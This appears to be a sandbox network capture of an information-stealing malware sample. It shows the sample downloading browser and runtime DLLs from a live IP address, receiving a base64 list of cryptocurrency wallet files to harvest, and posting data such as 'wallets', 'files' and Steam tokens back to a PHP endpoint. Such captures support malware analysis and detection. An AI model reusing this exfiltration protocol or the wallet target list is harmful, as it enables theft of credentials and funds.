                                                                                                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:25.869333029 CET94OUTGET /4a21a126be249f0d/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.071527958 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:25 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.381999969 CET90OUTGET /4a21a126be249f0d/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584578991 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:26 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 2046288
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:28.070709944 CET94OUTGET /4a21a126be249f0d/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:28.272874117 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:28 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 257872
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:28.637463093 CET98OUTGET /4a21a126be249f0d/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:28.840054989 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:28 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 80880
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:29.547641993 CET202OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDH
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 1067
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:29.908035040 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:29 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:29.978231907 CET468OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="message"wallets------EBGDAAKJJDAAKFHJKJKF--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.182094097 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:30 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 2408
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.184585094 CET466OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 265
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="message"files------FBAAAKFCAFIIDHIDGHIE--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.387994051 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:30 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.400667906 CET564OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: ------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="file"------DAFCAAEGDBKJJKECBKFH--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.607937098 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:30 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.734564066 CET473OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 272
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="message"ybncbhylepme------FCFBFBFBKFIDHJKFCAFC--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.940680981 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:30 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=86
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.943434954 CET473OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGH
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 272
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------CBAKJEHDBGHIEBGCGDGHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CBAKJEHDBGHIEBGCGDGH--
